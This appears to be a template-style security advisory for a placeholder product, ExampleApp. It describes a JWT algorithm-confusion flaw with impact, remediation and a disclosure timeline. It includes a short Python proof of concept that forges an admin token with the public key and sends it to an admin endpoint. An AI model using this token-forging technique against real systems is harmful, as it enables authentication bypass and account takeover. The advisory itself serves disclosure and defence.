Summary
ExampleApp’s JWT verification endpoint accepted alg: none and RS256-to-HS256 algorithm confusion, allowing an attacker to forge arbitrary tokens and impersonate any user including administrators.
Affected Software
| Field | Value |
|---|---|
| Vendor | ExampleCorp |
| Product | ExampleApp |
| Version | ≤ 4.2.1 |
| CVE | CVE-2024-0001 |
| CVSS Score | 9.8 (Critical) |
Technical Details
The application used the public RSA key as a symmetric HMAC secret when the algorithm was switched from RS256 to HS256. Since the public key is — by design — publicly accessible, an attacker could sign tokens with it and have them accepted as valid RS256-verified tokens.
The verification code called jwt.decode(token, public_key) without enforcing the expected algorithm, relying solely on the alg header in the token itself.
Proof of Concept
1import jwt
2import requests
3
4public_key = requests.get("https://target.example.com/.well-known/jwks.json").text
5
6forged = jwt.encode(
7 {"sub": "admin", "role": "superuser"},
8 public_key,
9 algorithm="HS256"
10)
11
12r = requests.get(
13 "https://target.example.com/api/admin",
14 headers={"Authorization": f"Bearer {forged}"}
15)
16print(r.status_code, r.json())
Impact
Full authentication bypass. Any unauthenticated attacker can impersonate any user account including administrators, leading to full application compromise.
Remediation
- Enforce a fixed, server-side algorithm whitelist — never trust the
algheader in the token. - Use a library that requires explicit algorithm specification at verification time.
- Rotate all existing session tokens post-patch.
Timeline
| Date | Event |
|---|---|
| 2024-01-10 | Initial discovery |
| 2024-01-12 | Vendor notified |
| 2024-01-28 | CVE-2024-0001 assigned |
| 2024-03-10 | Patch released (4.2.2) |
| 2024-03-15 | Public disclosure |